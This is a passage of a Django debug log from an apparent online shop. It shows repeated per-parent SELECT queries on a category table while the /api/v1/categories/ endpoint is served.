"shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 10:00:27,562 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 10:00:27,564 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 10:00:27,567 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 10:00:27,569 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 10:00:27,571 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 10:00:27,574 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 10:00:27,577 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 10:00:27,579 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 10:00:27,581 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 10:00:27,583 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 10:00:27,585 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 10:00:27,589 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 10:00:27,591 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 10:00:27,593 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 10:00:27,595 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 10:00:27,597 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 10:00:27,601 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 10:00:27,603 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 10:00:27,605 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 10:00:27,607 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 10:00:27,610 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 10:00:27,613 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 10:00:27,615 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 10:00:27,617 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 10:00:27,620 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 10:00:27,622 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 10:00:27,624 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 10:00:27,627 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 10:00:27,629 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 10:00:27,631 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 10:00:27,634 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 10:00:27,636 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 10:00:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 10:00:34,468 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 10:00:34,478 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 10:00:34,484 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 10:00:34,488 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 10:00:34,494 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 10:00:34,498 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 10:00:34,502 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 10:00:34,506 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 10:00:34,511 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 10:00:34,517 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 10:00:34,521 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 10:00:34,526 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 10:00:34,530 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 10:00:34,534 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 10:00:34,540 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 10:00:34,544 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 10:00:34,548 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 10:00:34,552 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 10:00:34,556 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 10:00:34,563 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 10:00:34,567 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 10:00:34,571 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 10:00:34,575 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 10:00:34,579 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 10:00:34,583 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 10:00:34,589 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 10:00:34,593 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 10:00:34,599 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 10:00:34,605 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 10:00:34,609 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 10:00:34,616 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 10:00:34,620 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 10:00:34,624 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 10:00:34,628 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 10:00:34,632 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 10:00:34,638 utils 4252 140031503103744 